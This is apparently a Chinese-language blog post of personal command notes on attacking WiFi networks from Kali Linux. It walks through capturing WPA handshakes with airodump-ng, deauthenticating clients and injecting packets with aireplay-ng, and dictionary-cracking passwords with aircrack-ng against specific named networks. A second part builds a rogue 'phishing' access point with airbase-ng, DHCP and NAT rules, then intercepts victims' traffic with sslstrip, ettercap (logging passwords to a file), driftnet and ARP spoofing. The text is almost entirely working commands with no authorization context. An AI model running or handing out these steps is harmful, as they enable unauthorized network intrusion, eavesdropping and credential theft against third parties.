kali linux——aircrack-ng_rfkill unblock与kali

作者：AllinToyou | 2024-06-03 00:07:03

踩

rfkill unblock与kali

kali---aircrack-ng破解wifi密码

1.下载安装aircrack-ng
   a.直接从源中安装
       apt-get install aircrack-ng
   b.下载编译安装
       下载aircrack-ng-1.1.tar.gz(http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz)
       解压缩，进入解压缩后的目录，对Makefile进行make，然后使用make Makefile install进行安装
       可能需要安装openssl才能够正常编译。
       可以使用命令
       apt-get install libssl-dev
       来安装openssl

2.启动无线，开一个终端，ifconfig -a看看wlan是否开启，开启正常可进行下一步。这时还可以获得本机的mac地址。

3.寻找要破解的网络，开启破解。开启终端1.
   a.使用命令
      iwlist wlan0 scanning

      有的无线在最后终止监控wlan0mon后再使用这个命令会没有用，这是需要重启这个无线网卡。本次测试中所使用的无线就会出现这种情况。

      然后找到所选的网络，获得其mac地址，通道，essid等信息
      使用命令
      airmon-ng start wlan0
      开启一个监控

4.开启终端1

ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2

   b.使用命令
      airmon-ng start wlan0

      airodump-ng wlan0mon

airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607
airodump-ng wlan0mon --essid 606-ztg
airodump-ng wlan0 --essid 606-ztg

airodump-ng -w longas wlan0mon --essid aidajingjing

      这时会看到无线的地址出现在屏幕上。

      屏幕上会显示出它们的mac地址以及所在频道。
      选择所需的无线，记录其所在的频道以及mac地址。

4.开启终端2
   使用命令

   airodump-ng -c 频道 --bssid 目标主机的mac -w name wlan0mon

airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w name wlan0mon
airodump-ng -c 10 --bssid 14:75:90:8B:BE:4E -w name wlan0mon

00:23:6C:97:21:89
00:26:C7:72:B2:3C
F0:27:65:6B:09:97
A8:A6:68:1A:D8:1D

   这里的name为存包文件的名字，可以更改。

5.开启终端3
   使用命令

   aireplay-ng -1 0 -a 目标的mac -h 本机的mac wlan0mon

aireplay-ng -1 0 -a C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon

   这时会有成功字样显示。如果没有显示可能就是目标不支持或者系统部稳定，需要更换目标了。
   显示成功后进行下步。

   继续输入命令
   aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标的mac -h 本机的mac wlan0mon

aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon

   此时终端2中的数据会增长很快，当数据到达5000的时候就可以破解了。

root@debian:~# aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon

7.开启终端4
   使用命令longas
aircrack-ng name*.cap

aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap

   name为自己索取的名字

   这时就开始破解了，如果你进行过多组，可能会有多组结果，你可以用数字123进行选择。
   如果没有破解出来，程序会自动等待到再有5000个数据时重新破解。
   如果不出意外，最终你能够破解出来这组无线的密码。

8.最后
   在一个终端中输入命令
   airmon-ng stop wlan0mon

   结束监控过程
   （airomon-ng check可以查看你开启了多少监控，如果运行多组的时候可以查看后选择关闭）

++++++++++++++++++++++++++ 使用Aircrack-ng破解WPA/WPA2-PSK加密无线网络 ++++++++++++++++++++++++++++++++++
CH 1 ][ Elapsed: 4 mins ][ 2015-09-07 07:53

BSSID              PWR Beacons    #Data, #/s CH MB   ENC CIPHER AUTH ESSID
C8:3A:35:14:AB:18   -3      748      154    0 10 54e WPA CCMP   PSK 606-ztg

BSSID              STATION            PWR   Rate    Lost    Frames Probe
C8:3A:35:14:AB:18 C8:AA:21:DF:0D:6D -25    1e- 1e     0      156

开启终端1
ifconfig -a
airmon-ng start wlan0
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2

airodump-ng -w name wlan0mon
airodump-ng -w name wlan0mon --essid 606-ztg

开启终端2
airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w log wlan0mon

开启终端3
aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon

开启终端4
aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst log*.cap

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill block 2
rfkill unblock 2

airmon-ng start wlan0
airmon-ng stop wlan0

airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607

airodump-ng -w longas wlan0mon --essid aidajingjing

+++++++++++++++++++++++ 7.5 实例——Kali Linux中创建钓鱼WiFi热点 +++++++++++++++++++++++++++++++++++++

ifconfig -a
airmon-ng start wlan0          #激活网卡至监听模式
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2
airbase-ng -c 12 -e ztg wlan0mon

root@debian:~# iw wlan0mon del
root@debian:~# iw wlan0 del
root@debian:~# iw phy phy0 interface add wlan0 type monitor

+++++++++++++++++++++++ 利用Kali进行WiFi钓鱼测试实战 +++++++++++++++++++++++++++++++++++++
http://www.freebuf.com/articles/wireless/69840.html

route -n -A inet | grep UG

0.0.0.0         10.108.160.1    0.0.0.0         UG    1024   0        0 eth0
10.3.9.31       10.108.160.1    255.255.255.255 UGH   1      0        0 eth0

gatewayip = 10.108.160.1
internet_interface = eth0
fakeap_interface = wlan0
ESSID = aaaa

-------终端窗口1

ifconfig -a

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

SIOCSIFFLAGS: Operation not possible due to RF-kill

rfkill list

0: phy0: Wireless LAN
   Soft blocked: yes
   Hard blocked: no
1: tpacpi_bluetooth_sw: Bluetooth
   Soft blocked: no
   Hard blocked: no
2: hci0: Bluetooth
   Soft blocked: no
   Hard blocked: no

rfkill unblock 1
ifconfig wlan0 up
airmon-ng start wlan0
root@debian:~# airbase-ng -e ztg wlan0

airbase-ng wlan0 -e ztg -c 10

airbase-ng wlan0mon -e ztg -c 10

iw wlan0 del; iw wlan0mon del; iw phy phy0 interface add wlan0 type monitor;

iw wlan0 del; iw phy phy0 interface add wlan0 type monitor; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airmon-ng start wlan0; airbase-ng wlan0 -e ztg -c 10

ifconfig wlan0 down; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airbase-ng wlan0 -e ztg -c 10
-------

//airmon-ng start wlan0
//airbase-ng -c 12 -e ztg wlan0

-------终端窗口2
root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; ifconfig at0 mtu 1420; ifconfig wlan0 mtu 1460; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;

root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;

-------

# Tables

ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1420
ifconfig wlan0 mtu 1460
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -Z
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE

//iptables -A FORWARD -i eth0 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
//iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
//iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source 10.108.160.1
//iptables -t nat -A PREROUTING -i at0 -j DNAT --to-source 10.108.160.1

-------终端窗口3
root@debian:~# /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
-------

# DHCP

#dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server restart
/etc/init.d/isc-dhcp-server start
/etc/init.d/isc-dhcp-server stop

dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0; /etc/init.d/isc-dhcp-server restart;

-------终端窗口4
root@debian:~# driftnet -i at0
-------

-------终端窗口4
root@debian:~# sslstrip -f -p -k 10000
-------

-------终端窗口5
root@debian:~# ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0
-------

-------终端窗口6
root@debian:~# mkdir -p "/pentest/wireless/airssl/driftnetdata"
root@debian:~# driftnet -i eth0 -p -d /pentest/wireless/airssl/driftnetdata
-------

export PATH=$PATH:/mnt/opt/android-on-linux/android-sdk-linux/platform-tools/

iwconfig wlan0 txpower 15
iw dev wlan0 set txpower fixed 30

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡（或者什么能上网的网卡）上面
iptables -A FORWARD -p tcp --syn -s 192.168.1.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
iw phy0 info
iw wlan0 info

root@debian:~# cat /etc/NetworkManager/system-connections/

++++++++++++++设置发射功率
iw list
ifconfig wlan0 down
iw reg set BO
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30
ifconfig wlan0 up

+++++++++++++++++++

ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -M arp:remote //192.168.0.1/ //192.168.1.101/

++++++++++++++++++

oot@debian:~# lspci -tv
-[0000:00]-+-00.0 Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller
           +-01.0-[01]----00.0 NVIDIA Corporation GF117M [GeForce 610M/710M/820M / GT 620M/625M/630M/720M]
           +-02.0 Intel Corporation 4th Gen Core Processor Integrated Graphics Controller
           +-03.0 Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller
           +-14.0 Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI
           +-16.0 Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1
           +-1a.0 Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #2
           +-1b.0 Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller
           +-1c.0-[02-06]--
           +-1c.1-[07]----00.0 Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
           +-1c.2-[08-0c]--
           +-1c.3-[0d]----00.0 Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
           +-1c.4-[0e-12]----00.0 Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader
           +-1d.0 Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1
           +-1f.0 Intel Corporation HM86 Express LPC Controller
           +-1f.2 Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode]
           \-1f.3 Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller
root@debian:~#

root@debian:~# lspci -vnn
07:00.0 Network controller [0280]: Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter [10ec:b723]
   Subsystem: Lenovo Device [17aa:b728]
   Flags: bus master, fast devsel, latency 0, IRQ 17
   I/O ports at 6000 [size=256]
   Memory at f5d00000 (64-bit, non-prefetchable) [size=16K]
   Capabilities: [40] Power Management version 3
   Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
   Capabilities: [70] Express Endpoint, MSI 00
   Capabilities: [100] Advanced Error Reporting
   Capabilities: [140] Device Serial Number 00-23-b7-fe-ff-4c-e0-00
   Capabilities: [150] Latency Tolerance Reporting
   Capabilities: [158] L1 PM Substates
   Kernel driver in use: rtl8723be

阅读(65) | 评论(0) | 转发(0) |

上一篇：Hacking WPA 2 Key - Evil Twin (No Bruteforce)

下一篇：adb shell --- error: device unauthorized.